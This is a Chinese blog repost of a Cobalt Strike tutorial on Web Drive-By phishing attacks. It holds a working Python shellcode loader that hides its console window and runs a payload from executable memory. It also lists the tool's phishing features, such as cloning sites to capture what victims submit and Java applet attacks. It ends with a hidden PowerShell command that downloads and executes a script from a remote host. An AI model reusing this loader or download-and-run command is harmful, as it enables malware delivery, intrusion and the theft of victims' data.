其他分享
首页 > 其他分享> > Cobalt Strike从入门到精通之Web Drive-By web钓鱼攻击

Cobalt Strike从入门到精通之Web Drive-By web钓鱼攻击

作者:互联网

https://www.bilibili.com/video/BV1P64y1f7e1?p=6

Cobalt Strike Web Drive-By web钓鱼攻击

在这里补充一个上节课的新的知识点,如何使用python语言的payload 加载器去攻击

# length: 894 bytes
from ctypes import *
import ctypes
buf = "" #这里填写payload
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr: 
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
       if 1:
              ctypes.windll.user32.ShowWindow(whnd, 0)   
              ctypes.windll.kernel32.CloseHandle(whnd)
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

模块介绍

翻译

这个菜单的中英文翻译

Manage  对开启的web服务进行管理;
Clone Site 克隆网站,可以记录受害者提交的数据;
Host File 提供一个文件下载,可以修改Mime信息;
Scripted Web Delivery 类似于msf 的web_delivery ;
Signed Applet Attack 使用java自签名的程序进行钓鱼攻击;
Smart Applet Attack 自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本;
System Profiler 用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等。
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.149.208:80/test'))"

标签:Web,addr,web,int,windll,Drive,len,ctypes,shellcode
来源: https://www.cnblogs.com/fxsec/p/14494250.html